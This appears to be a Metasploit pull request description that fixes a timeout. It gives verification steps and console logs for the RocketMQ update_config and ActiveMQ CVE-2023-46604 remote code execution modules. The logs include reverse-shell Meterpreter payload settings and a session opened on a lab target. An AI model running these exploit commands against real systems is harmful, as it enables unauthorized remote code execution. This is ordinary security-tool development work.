Verification
RocketMQ
Do: use exploit/multi/http/apache_rocketmq_update_config.
Set the RHOST and LHOST options.
Run the module.
Receive a session in the context of the user running the RocketMQ application.
ActiveMQ
Steps (Linux target):
Start msfconsole
use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
set RHOST <LINUX_TARGET_IP>
set SRVHOST eth0
set target 1
set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
check
exploit
Ensure neither module hangs, times out or errors in any unexpected way (they shouldn't).
Testing
RocketMQ
msf6 exploit(multi/http/apache_rocketmq_update_config) > options
Module options (exploit/multi/http/apache_rocketmq_update_config):
Name Current Setting Required Description
---- --------------- -------- -----------
BROKER_PORT 10911 no The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the NameServer response (recommended)
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 9876 yes The RocketMQ NameServer port (TCP)
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME ezCLiIlwE no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4434 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/apache_rocketmq_update_config) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:4434
[*] 127.0.0.1:9876 - Running automatic check ("set AutoCheck false" to disable)
[+] 127.0.0.1:9876 - The target appears to be vulnerable. RocketMQ version: 4.9.4
[*] 127.0.0.1:9876 - autodetection failed, assuming default port of 10911
[*] 127.0.0.1:9876 - Executing target: Automatic (Unix In-Memory) with payload cmd/linux/http/x64/meterpreter/reverse_tcp on Broker port: 10911
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] 127.0.0.1:9876 - Removing the payload from where it was injected into $ROCKETMQ_HOME. The FilterServerManager class will execute the payload every 30 seconds until this is reverted
[+] 127.0.0.1:9876 - Determined the original $ROCKETMQ_HOME: /home/rocketmq/rocketmq-4.9.4
[*] 127.0.0.1:9876 - Re-running the exploit in order to reset the proper $ROCKETMQ_HOME value
[*] Meterpreter session 11 opened (172.16.199.1:4434 -> 172.16.199.1:59206) at 2024-04-26 14:09:31 -0700
meterpreter > getuid
Server username: rocketmq
meterpreter > sysinfo
Computer : 172.17.0.3
OS : CentOS 7.9.2009 (Linux 6.6.22-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
[*] Shutting down session: 11
[*] 127.0.0.1 - Meterpreter session 11 closed. Reason: User exit
ActiveMQ
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > options
Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 61616 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Unix
View the full module info with the info, or info -d command.
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 127.0.0.1:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.6
Fixes a timeout issue that was being seen when running the following modules:
Once this PR is landed we should be able to close https://github.com/rapid7/metasploit-framework/pull/19037 & https://github.com/rapid7/metasploit-framework/pull/19038